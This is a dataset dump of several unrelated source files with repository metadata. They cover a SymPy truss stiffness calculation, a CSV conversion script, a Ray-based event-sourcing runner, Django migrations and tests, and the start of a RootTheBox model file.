objc = deepcopy(obj)
try:
tmp = DX(str(float(objc)))
objc = tmp.quantize(DX(str(pv)), rounding=rounding)
except:
for i in range(len(objc)):
tmp = DX(str(float(objc[i])))
objc[i] = tmp.quantize(DX(str(pv)), rounding=rounding)
return objc
# LateX:
kwargs = {}
kwargs["mat_str"] = "bmatrix"
kwargs["mat_delim"] = ""
# kwargs["symbol_names"] = {FB: "F^{\mathsf B}", }
# Units:
(k, M, G ) = ( 10**3, 10**6, 10**9 )
(mm, cm) = ( m/1000, m/100 )
Newton = kg*m/s**2
Pa = Newton/m**2
MPa = M*Pa
GPa = G*Pa
kN = k*Newton
deg = pi/180
half = S(1)/2
# Header ends here.
#
EA, l, F1, F2 = var("EA, l, F1, F2")
sub_list = [
( EA, 2 *Pa*m**2 ),
( l, 1 *m ),
( F1, 1 *Newton /2 ), # due to symmetry
( F2, 2 *Newton /2 ), # due to symmetry
]
def k(phi):
""" element stiffness matrix """
# phi is angle between:
# 1. vector along global x axis
# 2. vector along 1-2-axis of truss
# phi is counted positively about z.
# pprint("phi / deg:")
# pprint(N(deg(phi),3))
(c, s) = ( cos(phi), sin(phi) )
(cc, ss, sc) = ( c*c, s*s, s*c)
return Matrix(
[
[ cc, sc, -cc, -sc],
[ sc, ss, -sc, -ss],
[-cc, -sc, cc, sc],
[-sc, -ss, sc, ss],
])
(p1, p2, p3) = (315*pi/180, 0 *pi/180, 45 *pi/180)
# k2 uses only 1/2 A due to symmetry:
(k1, k2, k3) = (EA/l*k(p1), EA/2/l*k(p2), EA/l*k(p3))
pprint("\nk1 / (EA / l): ")
pprint(k1 / (EA/l) )
pprint("\nk2 / (EA / l): ")
pprint(k2 / (EA/l) )
pprint("\nk3 / (EA / l): ")
pprint(k3 / (EA/l) )
K = EA/l*Matrix([
[ 1 , -S(1)/2 ],
[ -S(1)/2, 1 ]
])
u2x, u3x = var("u2x, u3x")
u = Matrix([u2x , u3x ])
f = Matrix([F1 , F2 ])
u2x, u3x = var("u2x, u3x")
eq = Eq(K*u , f)
sol = solve(eq, [u2x, u3x])
pprint("\nSolution:")
pprint(sol)
u2x, u3x = sol[u2x], sol[u3x]
pprint("\nu2x / m:")
tmp = u2x.subs(sub_list)
tmp /= m
pprint(tmp)
pprint("\nu3x / m:")
tmp = u3x.subs(sub_list)
tmp /= m
pprint(tmp)
pprint("\nF1x / N:")
tmp = - EA/l * u2x/2
tmp = tmp.subs(sub_list)
tmp /= Newton
pprint(tmp)
# k1 / (EA / l):
# ⎡1/2 -1/2 -1/2 1/2 ⎤
# ⎢ ⎥
# ⎢-1/2 1/2 1/2 -1/2⎥
# ⎢ ⎥
# ⎢-1/2 1/2 1/2 -1/2⎥
# ⎢ ⎥
# ⎣1/2 -1/2 -1/2 1/2 ⎦
#
# k2 / (EA / l):
# ⎡1/2 0 -1/2 0⎤
# ⎢ ⎥
# ⎢ 0 0 0 0⎥
# ⎢ ⎥
# ⎢-1/2 0 1/2 0⎥
# ⎢ ⎥
# ⎣ 0 0 0 0⎦
#
# k3 / (EA / l):
# ⎡1/2 1/2 -1/2 -1/2⎤
# ⎢ ⎥
# ⎢1/2 1/2 -1/2 -1/2⎥
# ⎢ ⎥
# ⎢-1/2 -1/2 1/2 1/2 ⎥
# ⎢ ⎥
# ⎣-1/2 -1/2 1/2 1/2 ⎦
#
# Solution:
# ⎧ 2⋅l⋅(2⋅F₁ + F₂) 2⋅l⋅(F₁ + 2⋅F₂)⎫
# ⎨u2x: ───────────────, u3x: ───────────────⎬
# ⎩ 3⋅EA 3⋅EA ⎭
#
# u2x / m:
# 2/3
#
# u3x / m:
# 5/6
#
# F1x / N:
# -2/3
| 21.433526
| 66
| 0.432848
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,702
| 0.437757
|
fbfd7d6f8721ebc2b678a03f3cc15caf4d6fced6
| 870
|
py
|
Python
|
ucc_csv_create.py
|
MasonDMitchell/HackNC-2019
|
4656f9dcc15ee86c66885267006ed9f4f5b935e7
|
[
"MIT"
] | null | null | null |
ucc_csv_create.py
|
MasonDMitchell/HackNC-2019
|
4656f9dcc15ee86c66885267006ed9f4f5b935e7
|
[
"MIT"
] | null | null | null |
ucc_csv_create.py
|
MasonDMitchell/HackNC-2019
|
4656f9dcc15ee86c66885267006ed9f4f5b935e7
|
[
"MIT"
] | 1
|
2019-10-12T15:09:06.000Z
|
2019-10-12T15:09:06.000Z
|
#!/usr/bin/python3
import csv
ucc_dictionary_file_list = [
'./downloads/diary08/diary08/uccd08.txt',
'./downloads/diary09/diary09/uccd09.txt',
'./downloads/diary11/diary11/uccd11.txt',
'./downloads/diary10/diary10/uccd10.txt',
]
cleaned_ucc_dictionary = dict()
for dictionary in ucc_dictionary_file_list:
with open(dictionary) as file:
line_list = file.read().splitlines()
for line in line_list:
ucc_tuple = tuple(line.split(" ", 1))
cleaned_ucc_dictionary[int(ucc_tuple[0])] = ucc_tuple[1]
with open('cleaned_ucc_dictionary.csv', 'w', newline='') as csvfile:
ucc_writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)
for key, value in cleaned_ucc_dictionary.items():
ucc_writer.writerow([key, value])
# print(len(cleaned_ucc_dictionary.keys()))
# print(line_list)
| 33.461538
| 78
| 0.688506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 278
| 0.31954
|
fbff8e3dec4d22f8cf3a2af319e44b94680c5703
| 30,937
|
py
|
Python
|
eventsourcing/system/ray.py
|
gerbyzation/eventsourcing
|
a9e9ecf123af658762832cf97a9f00f8f7064393
|
[
"BSD-3-Clause"
] | null | null | null |
eventsourcing/system/ray.py
|
gerbyzation/eventsourcing
|
a9e9ecf123af658762832cf97a9f00f8f7064393
|
[
"BSD-3-Clause"
] | null | null | null |
eventsourcing/system/ray.py
|
gerbyzation/eventsourcing
|
a9e9ecf123af658762832cf97a9f00f8f7064393
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
import os
import traceback
from inspect import ismethod
from queue import Empty, Queue
from threading import Event, Lock, Thread
from time import sleep
from typing import Dict, Optional, Tuple, Type
import ray
from eventsourcing.application.process import ProcessApplication
from eventsourcing.application.simple import (
ApplicationWithConcreteInfrastructure,
Prompt,
PromptToPull,
is_prompt_to_pull,
)
from eventsourcing.domain.model.decorators import retry
from eventsourcing.domain.model.events import subscribe, unsubscribe
from eventsourcing.exceptions import (
EventSourcingError,
ExceptionWrapper,
OperationalError,
ProgrammingError,
RecordConflictError,
)
from eventsourcing.infrastructure.base import (
DEFAULT_PIPELINE_ID,
RecordManagerWithNotifications,
)
from eventsourcing.system.definition import (
AbstractSystemRunner,
System,
TProcessApplication,
)
from eventsourcing.system.rayhelpers import RayDbJob, RayPrompt
from eventsourcing.system.raysettings import ray_init_kwargs
from eventsourcing.system.runner import DEFAULT_POLL_INTERVAL
ray.init(**ray_init_kwargs)
MAX_QUEUE_SIZE = 1
PAGE_SIZE = 20
MICROSLEEP = 0.000
PROMPT_WITH_NOTIFICATION_IDS = False
PROMPT_WITH_NOTIFICATION_OBJS = False
GREEDY_PULL_NOTIFICATIONS = True
class RayRunner(AbstractSystemRunner):
"""
Uses actor model framework to run a system of process applications.
"""
def __init__(
self,
system: System,
pipeline_ids=(DEFAULT_PIPELINE_ID,),
poll_interval: Optional[int] = None,
setup_tables: bool = False,
sleep_for_setup_tables: int = 0,
db_uri: Optional[str] = None,
**kwargs
):
super(RayRunner, self).__init__(system=system, **kwargs)
self.pipeline_ids = list(pipeline_ids)
self.poll_interval = poll_interval
self.setup_tables = setup_tables or system.setup_tables
self.sleep_for_setup_tables = sleep_for_setup_tables
self.db_uri = db_uri
self.ray_processes: Dict[Tuple[str, int], RayProcess] = {}
def start(self):
"""
Starts all the actors to run a system of process applications.
"""
# Check we have the infrastructure classes we need.
for process_class in self.system.process_classes.values():
if not isinstance(process_class, ApplicationWithConcreteInfrastructure):
if not self.infrastructure_class:
raise ProgrammingError("infrastructure_class is not set")
elif not issubclass(
self.infrastructure_class, ApplicationWithConcreteInfrastructure
):
raise ProgrammingError(
"infrastructure_class is not a subclass of {}".format(
ApplicationWithConcreteInfrastructure
)
)
# Get the DB_URI.
# Todo: Support different URI for different application classes.
env_vars = {}
db_uri = self.db_uri or os.environ.get("DB_URI")
if db_uri is not None:
env_vars["DB_URI"] = db_uri
# Start processes.
for pipeline_id in self.pipeline_ids:
for process_name, process_class in self.system.process_classes.items():
ray_process_id = RayProcess.remote(
application_process_class=process_class,
infrastructure_class=self.infrastructure_class,
env_vars=env_vars,
poll_interval=self.poll_interval,
pipeline_id=pipeline_id,
setup_tables=self.setup_tables,
)
self.ray_processes[(process_name, pipeline_id)] = ray_process_id
init_ids = []
for key, ray_process in self.ray_processes.items():
process_name, pipeline_id = key
upstream_names = self.system.upstream_names[process_name]
downstream_names = self.system.downstream_names[process_name]
downstream_processes = {
name: self.ray_processes[(name, pipeline_id)]
for name in downstream_names
}
upstream_processes = {}
for upstream_name in upstream_names:
upstream_process = self.ray_processes[(upstream_name, pipeline_id)]
upstream_processes[upstream_name] = upstream_process
init_ids.append(
ray_process.init.remote(upstream_processes, downstream_processes)
)
ray.get(init_ids)
def get_ray_process(self, process_name, pipeline_id=DEFAULT_PIPELINE_ID):
assert isinstance(process_name, str)
return self.ray_processes[(process_name, pipeline_id)]
def close(self):
super(RayRunner, self).close()
for process in self.ray_processes.values():
process.stop.remote()
def get(
self, process_class: Type[TProcessApplication], pipeline_id=DEFAULT_PIPELINE_ID
) -> TProcessApplication:
assert issubclass(process_class, ProcessApplication)
process_name = process_class.create_name()
ray_process = self.get_ray_process(process_name, pipeline_id)
return ProxyApplication(ray_process)
@ray.remote
class RayProcess:
def __init__(
self,
application_process_class: Type[ProcessApplication],
infrastructure_class: Type[ApplicationWithConcreteInfrastructure],
env_vars: dict = None,
pipeline_id: int = DEFAULT_PIPELINE_ID,
poll_interval: int = None,
setup_tables: bool = False,
):
# Process application args.
self.application_process_class = application_process_class
self.infrastructure_class = infrastructure_class
self.daemon = True
self.pipeline_id = pipeline_id
self.poll_interval = poll_interval or DEFAULT_POLL_INTERVAL
self.setup_tables = setup_tables
if env_vars is not None:
os.environ.update(env_vars)
# Setup threads, queues, and threading events.
self.readers_lock = Lock()
self._has_been_prompted = Event()
self.heads_lock = Lock()
self.heads = {}
self.positions_lock = Lock()
self.positions = {}
self.positions_initialised = Event()
self.db_jobs_queue = Queue(maxsize=MAX_QUEUE_SIZE)
self.upstream_event_queue = Queue(maxsize=MAX_QUEUE_SIZE)
self.downstream_prompt_queue = Queue() # no maxsize, call() can put prompt
self.has_been_stopped = Event()
self.db_jobs_thread = Thread(target=self.db_jobs)
self.db_jobs_thread.setDaemon(True)
self.db_jobs_thread.start()
self.process_prompts_thread = Thread(target=self._process_prompts)
self.process_prompts_thread.setDaemon(True)
self.process_prompts_thread.start()
self.process_events_thread = Thread(target=self._process_events)
self.process_events_thread.setDaemon(True)
self.process_events_thread.start()
self.push_prompts_thread = Thread(target=self._push_prompts)
self.push_prompts_thread.setDaemon(True)
self.push_prompts_thread.start()
self._notification_rayids = {}
self._prompted_notifications = {}
def db_jobs(self):
# print("Running do_jobs")
while not self.has_been_stopped.is_set():
try:
item = self.db_jobs_queue.get(timeout=1)
self.db_jobs_queue.task_done()
except Empty:
if self.has_been_stopped.is_set():
break
else:
if item is None or self.has_been_stopped.is_set():
break
db_job: RayDbJob = item
# self.print_timecheck("Doing db job", item)
try:
db_job.execute()
except Exception as e:
if db_job.error is None:
print(traceback.format_exc())
self._print_timecheck(
"Continuing after error running DB job:", e
)
sleep(1)
# else:
# self.print_timecheck("Done db job", item)
@retry((OperationalError, RecordConflictError), max_attempts=100, wait=0.01)
def do_db_job(self, method, args, kwargs):
db_job = RayDbJob(method, args=args, kwargs=kwargs)
self.db_jobs_queue.put(db_job)
db_job.wait()
if db_job.error:
raise db_job.error
# self.print_timecheck("db job delay:", db_job.delay)
# self.print_timecheck("db job duration:", db_job.duration)
# self.print_timecheck('db job result:', db_job.result)
return db_job.result
def init(self, upstream_processes: dict, downstream_processes: dict) -> None:
"""
Initialise with actor handles for upstream and downstream processes.
Need to initialise after construction so that all handles exist.
"""
self.upstream_processes = upstream_processes
self.downstream_processes = downstream_processes
# Subscribe to broadcast prompts published by the process application.
subscribe(handler=self._enqueue_prompt_to_pull, predicate=is_prompt_to_pull)
# Construct process application object.
process_class = self.application_process_class
if not isinstance(process_class, ApplicationWithConcreteInfrastructure):
if self.infrastructure_class:
process_class = process_class.mixin(self.infrastructure_class)
else:
raise ProgrammingError("infrastructure_class is not set")
class MethodWrapper(object):
def __init__(self, method):
self.method = method
def __call__(self, *args, **kwargs):
try:
return self.method(*args, **kwargs)
except EventSourcingError as e:
return ExceptionWrapper(e)
class ProcessApplicationWrapper(object):
def __init__(self, process_application):
self.process_application = process_application
def __getattr__(self, item):
attribute = getattr(self.process_application, item)
if ismethod(attribute):
return MethodWrapper(attribute)
else:
return attribute
def construct_process():
return process_class(
pipeline_id=self.pipeline_id, setup_table=self.setup_tables
)
process_application = self.do_db_job(construct_process, (), {})
assert isinstance(process_application, ProcessApplication), process_application
self.process_wrapper = ProcessApplicationWrapper(process_application)
self.process_application = process_application
for upstream_name, ray_notification_log in self.upstream_processes.items():
# Make the process follow the upstream notification log.
self.process_application.follow(upstream_name, ray_notification_log)
self._reset_positions()
self.positions_initialised.set()
def _reset_positions(self):
self.do_db_job(self.__reset_positions, (), {})
def __reset_positions(self):
with self.positions_lock:
for upstream_name in self.upstream_processes:
recorded_position = self.process_application.get_recorded_position(
upstream_name
)
self.positions[upstream_name] = recorded_position
def add_downstream_process(self, downstream_name, ray_process_id):
self.downstream_processes[downstream_name] = ray_process_id
def call(self, method_name, *args, **kwargs):
"""
Method for calling methods on process application object.
"""
assert self.positions_initialised.is_set(), "Please call .init() first"
# print("Calling", method_name, args, kwargs)
if self.process_wrapper:
method = getattr(self.process_wrapper, method_name)
return self.do_db_job(method, args, kwargs)
else:
raise Exception(
"Can't call method '%s' before process exists" % method_name
)
def prompt(self, prompt: RayPrompt) -> None:
assert isinstance(prompt, RayPrompt), "Not a RayPrompt: %s" % prompt
for notification_id, rayid in prompt.notification_ids:
# self._print_timecheck("Received ray notification ID:", notification_id, rayid)
self._notification_rayids[(prompt.process_name, notification_id)] = rayid
latest_head = prompt.head_notification_id
upstream_name = prompt.process_name
if PROMPT_WITH_NOTIFICATION_OBJS:
for notification in prompt.notifications:
self._prompted_notifications[
(upstream_name, notification["id"])
] = notification
if latest_head is not None:
with self.heads_lock:
# Update head from prompt.
if upstream_name in self.heads:
if latest_head > self.heads[upstream_name]:
self.heads[upstream_name] = latest_head
self._has_been_prompted.set()
else:
self.heads[upstream_name] = latest_head
self._has_been_prompted.set()
else:
self._has_been_prompted.set()
def _process_prompts(self) -> None:
# Loop until stop event is set.
self.positions_initialised.wait()
while not self.has_been_stopped.is_set():
try:
self.__process_prompts()
except Exception as e:
if not self.has_been_stopped.is_set():
print(traceback.format_exc())
print("Continuing after error in 'process prompts' thread:", e)
print()
sleep(1)
def __process_prompts(self):
# Wait until prompted.
self._has_been_prompted.wait()
if self.has_been_stopped.is_set():
return
# self.print_timecheck('has been prompted')
current_heads = {}
with self.heads_lock:
self._has_been_prompted.clear()
for upstream_name in self.upstream_processes.keys():
current_head = self.heads.get(upstream_name)
current_heads[upstream_name] = current_head
for upstream_name in self.upstream_processes.keys():
with self.positions_lock:
current_position = self.positions.get(upstream_name)
first_id = current_position + 1 # request the next one
current_head = current_heads[upstream_name]
if current_head is None:
last_id = None
elif current_position < current_head:
if GREEDY_PULL_NOTIFICATIONS:
last_id = first_id + PAGE_SIZE - 1
else:
last_id = min(current_head, first_id + PAGE_SIZE - 1)
else:
# self.print_timecheck(
# "Up to date with", upstream_name, current_position,
# current_head
# )
continue
# last_id = first_id + PAGE_SIZE - 1
# self.print_timecheck(
# "Getting notifications in range:",
# upstream_name,
# "%s -> %s" % (first_id, last_id),
# )
upstream_process = self.upstream_processes[upstream_name]
# Works best without prompted head as last requested,
# because there might be more notifications since.
# Todo: However, limit the number to avoid getting too many, and
# if we got full quota, then get again.
notifications = []
if PROMPT_WITH_NOTIFICATION_IDS or PROMPT_WITH_NOTIFICATION_OBJS:
if last_id is not None:
for notification_id in range(first_id, last_id + 1):
if PROMPT_WITH_NOTIFICATION_IDS:
try:
rayid = self._notification_rayids.pop(
(upstream_name, notification_id)
)
except KeyError:
break
else:
notification = ray.get(rayid)
# self._print_timecheck(
# "Got notification from ray id",
# notification_id,
# rayid,
# notification,
# )
notifications.append(notification)
elif PROMPT_WITH_NOTIFICATION_OBJS:
try:
notification = self._prompted_notifications.pop(
(upstream_name, notification_id)
)
# self._print_timecheck(
# "Got notification from prompted notifications dict",
# notification_id,
# notification,
# )
except KeyError:
break
else:
notifications.append(notification)
first_id += 1
# Pull the ones we don't have.
if last_id is None or first_id <= last_id:
# self._print_timecheck("Pulling notifications", first_id, last_id,
# 'from', upstream_name)
rayid = upstream_process.get_notifications.remote(first_id, last_id)
_notifications = ray.get(rayid)
# self._print_timecheck("Pulled notifications", _notifications)
notifications += _notifications
# self.print_timecheck(
# "Obtained notifications:", len(notifications), 'from',
# upstream_name
# )
if len(notifications):
if len(notifications) == PAGE_SIZE:
# self._print_timecheck("Range limit reached, reprompting...")
self._has_been_prompted.set()
position = notifications[-1]["id"]
with self.positions_lock:
current_position = self.positions[upstream_name]
if current_position is None or position > current_position:
self.positions[upstream_name] = position
queue_item = []
for notification in notifications:
# Check causal dependencies.
self.process_application.check_causal_dependencies(
upstream_name, notification.get("causal_dependencies")
)
# Get domain event from notification.
event = self.process_application.event_from_notification(
notification
)
# self.print_timecheck("obtained event", event)
# Put domain event on the queue, for event processing.
queue_item.append((event, notification["id"], upstream_name))
self.upstream_event_queue.put(queue_item)
sleep(MICROSLEEP)
def get_notifications(self, first_notification_id, last_notification_id):
"""
Returns a list of notifications, with IDs from first_notification_id
to last_notification_id, inclusive. IDs are 1-based sequence.
This is called by the "process prompts" thread of a downstream process.
"""
return self.do_db_job(
self._get_notifications, (first_notification_id, last_notification_id), {}
)
def _get_notifications(self, first_notification_id, last_notification_id):
record_manager = self.process_application.event_store.record_manager
assert isinstance(record_manager, RecordManagerWithNotifications)
start = first_notification_id - 1
stop = last_notification_id
return list(record_manager.get_notifications(start, stop))
def _process_events(self):
while not self.has_been_stopped.is_set():
try:
self.__process_events()
except Exception as e:
print(traceback.format_exc())
print("Continuing after error in 'process events' thread:", e)
sleep(1)
def __process_events(self):
try:
queue_item = self.upstream_event_queue.get() # timeout=5)
self.upstream_event_queue.task_done()
except Empty:
if self.has_been_stopped.is_set():
return
else:
if queue_item is None or self.has_been_stopped.is_set():
return
for (domain_event, notification_id, upstream_name) in queue_item:
# print("Processing upstream event:", (domain_event,
# notification_id, upstream_name))
new_events, new_records = (), ()
while not self.has_been_stopped.is_set():
try:
new_events, new_records = self.do_db_job(
method=self.process_application.process_upstream_event,
args=(domain_event, notification_id, upstream_name),
kwargs={},
)
break
except Exception as e:
print(traceback.format_exc())
self._print_timecheck(
"Retrying to reprocess event after error:", e
)
sleep(1)
# Todo: Forever? What if this is the wrong event?
if self.has_been_stopped.is_set():
return
# if new_events:
# self._print_timecheck("new events", len(new_events), new_events)
notifications = ()
notification_ids = ()
notifiable_events = [e for e in new_events if e.__notifiable__]
if len(notifiable_events):
if PROMPT_WITH_NOTIFICATION_IDS or PROMPT_WITH_NOTIFICATION_OBJS:
manager = self.process_application.event_store.record_manager
assert isinstance(manager, RecordManagerWithNotifications)
notification_id_name = manager.notification_id_name
notifications = []
for record in new_records:
if isinstance(
getattr(record, notification_id_name, None), int
):
notifications.append(
manager.create_notification_from_record(record)
)
if len(notifications):
head_notification_id = notifications[-1]["id"]
if PROMPT_WITH_NOTIFICATION_IDS:
notification_ids = self._put_notifications_in_ray_object_store(
notifications
)
# Clear the notifications, avoid sending with IDs.
notifications = ()
else:
head_notification_id = self._get_max_notification_id()
else:
head_notification_id = self._get_max_notification_id()
prompt = RayPrompt(
self.process_application.name,
self.process_application.pipeline_id,
head_notification_id,
notification_ids,
notifications,
)
# self.print_timecheck(
# "putting prompt on downstream " "prompt queue",
# self.downstream_prompt_queue.qsize(),
# )
self.downstream_prompt_queue.put(prompt)
sleep(MICROSLEEP)
# self.print_timecheck(
# "put prompt on downstream prompt " "queue"
# )
# sleep(0.1)
def _put_notifications_in_ray_object_store(self, notifications):
notification_ids = [(n["id"], ray.put(n)) for n in notifications]
return notification_ids
def _enqueue_prompt_to_pull(self, prompt):
# print("Enqueing locally published prompt:", prompt)
self.downstream_prompt_queue.put(prompt)
sleep(MICROSLEEP)
def _push_prompts(self) -> None:
while not self.has_been_stopped.is_set():
try:
self.__push_prompts()
except Exception as e:
print(traceback.format_exc())
print("Continuing after error in 'push prompts' thread:", e)
sleep(1)
def __push_prompts(self):
try:
item = self.downstream_prompt_queue.get() # timeout=1)
self.downstream_prompt_queue.task_done()
# Todo: Instead, drain the queue and consolidate prompts.
except Empty:
self._print_timecheck(
"timed out getting item from downstream prompt " "queue"
)
if self.has_been_stopped.is_set():
return
else:
# self.print_timecheck("task done on downstream prompt queue")
if item is None or self.has_been_stopped.is_set():
return
elif isinstance(item, PromptToPull):
if item.head_notification_id:
head_notification_id = item.head_notification_id
else:
head_notification_id = self._get_max_notification_id()
prompt = RayPrompt(
self.process_application.name,
self.process_application.pipeline_id,
head_notification_id,
)
else:
prompt = item
# self._print_timecheck('pushing prompt with', prompt.notification_ids)
prompt_response_ids = []
# self.print_timecheck("pushing prompts", prompt)
for downstream_name, ray_process in self.downstream_processes.items():
prompt_response_ids.append(ray_process.prompt.remote(prompt))
if self.has_been_stopped.is_set():
return
# self._print_timecheck("pushed prompt to", downstream_name)
ray.get(prompt_response_ids)
# self._print_timecheck("pushed prompts")
def _get_max_notification_id(self):
"""
Returns the highest notification ID of this process application.
:return:
"""
record_manager = self.process_application.event_store.record_manager
assert isinstance(record_manager, RecordManagerWithNotifications)
max_notification_id = self.do_db_job(
record_manager.get_max_notification_id, (), {}
)
# self.print_timecheck("MAX NOTIFICATION ID in DB:", max_notification_id)
return max_notification_id
def stop(self):
"""
Stops the process.
"""
# print("%s actor stopping %s" % (os.getpid(), datetime.datetime.now()))
self.has_been_stopped.set()
# print("%s actor joining db_jobs_thread %s" % (os.getpid(),
# datetime.datetime.now()))
self.db_jobs_queue.put(None)
self.upstream_event_queue.put(None)
self.downstream_prompt_queue.put(None)
self._has_been_prompted.set()
self.positions_initialised.set()
self.db_jobs_thread.join(timeout=1)
assert not self.db_jobs_thread.is_alive(), (
"DB jobs thread still alive"
)
# print("%s actor joining process_events_thread %s" % (os.getpid(),
# datetime.datetime.now()))
self.process_events_thread.join(timeout=1)
assert not self.process_events_thread.is_alive(), (
"Process events thread still alive"
)
# print("%s actor joining process_prompts_thread %s" % (os.getpid(),
# datetime.datetime.now()))
self.process_prompts_thread.join(timeout=1)
assert not self.process_prompts_thread.is_alive(), (
"Process prompts thread still alive"
)
# print("%s actor joining push_prompts_thread %s" % (os.getpid(),
# datetime.datetime.now()))
self.push_prompts_thread.join(timeout=1)
assert not self.push_prompts_thread.is_alive(), (
"Push prompts thread still alive"
)
self.process_application.close()
unsubscribe(handler=self._enqueue_prompt_to_pull, predicate=is_prompt_to_pull)
# print("%s actor stopped %s" % (os.getpid(), datetime.datetime.now()))
ray.actor.exit_actor()
def _print_timecheck(self, activity, *args):
# pass
process_name = self.application_process_class.__name__.lower()
print(
"Timecheck",
datetime.datetime.now(),
self.pipeline_id,
process_name,
activity,
*args
)
class ProxyApplication:
def __init__(self, ray_process: RayProcess):
self.ray_process: RayProcess = ray_process
def __getattr__(self, item):
return ProxyMethod(self.ray_process, item)
class ProxyMethod:
def __init__(self, ray_process: RayProcess, attribute_name: str):
self.ray_process: RayProcess = ray_process
self.attribute_name = attribute_name
def __call__(self, *args, **kwargs):
ray_id = self.ray_process.call.remote(self.attribute_name, *args, **kwargs)
return_value = ray.get(ray_id)
if isinstance(return_value, ExceptionWrapper):
raise return_value.e
else:
return return_value
| 41.030504
| 95
| 0.580761
| 29,594
| 0.956589
| 0
| 0
| 24,899
| 0.804829
| 0
| 0
| 5,374
| 0.173708
|
fbff951b3453445a7ed046dfadb09ce047c59a21
| 1,766
|
py
|
Python
|
authentik/stages/password/migrations/0007_app_password.py
|
BeryJu/passbook
|
350f0d836580f4411524614f361a76c4f27b8a2d
|
[
"MIT"
] | 15
|
2020-01-05T09:09:57.000Z
|
2020-11-28T05:27:39.000Z
|
authentik/stages/password/migrations/0007_app_password.py
|
BeryJu/passbook
|
350f0d836580f4411524614f361a76c4f27b8a2d
|
[
"MIT"
] | 302
|
2020-01-21T08:03:59.000Z
|
2020-12-04T05:04:57.000Z
|
authentik/stages/password/migrations/0007_app_password.py
|
BeryJu/passbook
|
350f0d836580f4411524614f361a76c4f27b8a2d
|
[
"MIT"
] | 3
|
2020-03-04T08:21:59.000Z
|
2020-08-01T20:37:18.000Z
|
# Generated by Django 3.2.6 on 2021-08-23 14:34
import django.contrib.postgres.fields
from django.apps.registry import Apps
from django.db import migrations, models
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from authentik.stages.password import BACKEND_APP_PASSWORD, BACKEND_INBUILT
def update_default_backends(apps: Apps, schema_editor: BaseDatabaseSchemaEditor):
PasswordStage = apps.get_model("authentik_stages_password", "passwordstage")
db_alias = schema_editor.connection.alias
stages = PasswordStage.objects.using(db_alias).filter(name="default-authentication-password")
if not stages.exists():
return
stage = stages.first()
stage.backends.append(BACKEND_APP_PASSWORD)
stage.save()
class Migration(migrations.Migration):
dependencies = [
("authentik_stages_password", "0006_passwordchange_rename"),
]
operations = [
migrations.AlterField(
model_name="passwordstage",
name="backends",
field=django.contrib.postgres.fields.ArrayField(
base_field=models.TextField(
choices=[
("authentik.core.auth.InbuiltBackend", "User database + standard password"),
("authentik.core.auth.TokenBackend", "User database + app passwords"),
(
"authentik.sources.ldap.auth.LDAPBackend",
"User database + LDAP password",
),
]
),
help_text="Selection of backends to test the password against.",
size=None,
),
),
migrations.RunPython(update_default_backends),
]
| 36.040816
| 100
| 0.625708
| 1,008
| 0.570781
| 0
| 0
| 0
| 0
| 0
| 0
| 463
| 0.262174
|
220006b165652d33b27e971f916a5a800cf16e0a
| 1,211
|
py
|
Python
|
article/tests/test_models.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
article/tests/test_models.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
article/tests/test_models.py
|
asb29/Redundant
|
ee816fd41f9217610bd11f757cf9175288723c70
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.contrib.auth.models import User
from article.models import Article, Category
class ArticleModelTestCase(TestCase):
def setUp(self):
self.category = Category.objects.create(name=u'Sports')
self.user = User.objects.create(username=u'test', password=u'secret')
def test_save(self):
new_article = Article.objects.create(
title=u'test',
content=u'test',
author=self.user,
category=self.category
)
self.assertEqual(new_article.title, u'test')
self.assertEqual(new_article.content, u'test')
self.assertEqual(new_article.author, self.user)
self.assertEqual(new_article.category, self.category)
def test_unique_slug(self):
new_article1 = Article.objects.create(
title=u'test',
content=u'test',
author=self.user,
category=self.category
)
new_article2 = Article.objects.create(
title=u'test',
content=u'test',
author=self.user,
category=self.category
)
self.assertTrue(new_article1.slug != new_article2.slug)
| 29.536585
| 77
| 0.6218
| 1,085
| 0.895954
| 0
| 0
| 0
| 0
| 0
| 0
| 81
| 0.066887
|
2200800f734e84798d40a112ef14379650a7d44d
| 145
|
py
|
Python
|
tests/test_import.py
|
GoodManWEN/typehints_checker
|
36e2b2f27b4c392543972e8e466f8e48dfeff274
|
[
"MIT"
] | null | null | null |
tests/test_import.py
|
GoodManWEN/typehints_checker
|
36e2b2f27b4c392543972e8e466f8e48dfeff274
|
[
"MIT"
] | null | null | null |
tests/test_import.py
|
GoodManWEN/typehints_checker
|
36e2b2f27b4c392543972e8e466f8e48dfeff274
|
[
"MIT"
] | null | null | null |
import os , sys
sys.path.append(os.getcwd())
import pytest
from typehints_checker import *
@pytest.mark.asyncio
async def test_import():
...
| 18.125
| 31
| 0.737931
| 0
| 0
| 0
| 0
| 53
| 0.365517
| 32
| 0.22069
| 0
| 0
|
2200a38582a5987a8032f11e6758387289477471
| 2,240
|
py
|
Python
|
models/FlagAttachment.py
|
jeffg2k/RootTheBox
|
1bb971f98da96f66c868f5786c2405321b0be976
|
[
"Apache-2.0"
] | 1
|
2020-02-28T16:23:12.000Z
|
2020-02-28T16:23:12.000Z
|
models/FlagAttachment.py
|
Warlockk/RootTheBox
|
e24f3e0350aec1b65be81cdc71ff09a5e1b8e587
|
[
"Apache-2.0"
] | null | null | null |
models/FlagAttachment.py
|
Warlockk/RootTheBox
|
e24f3e0350aec1b65be81cdc71ff09a5e1b8e587
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Nov 24, 2014
@author: moloch
Copyright 2014 Root the Box
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from uuid import uuid4
from sqlalchemy import Column, ForeignKey
from sqlalchemy.types import Unicode, String, Integer
from models.BaseModels import DatabaseObject
from libs.StringCoding import encode, decode
from builtins import str
from tornado.options import options
class FlagAttachment(DatabaseObject):
"""
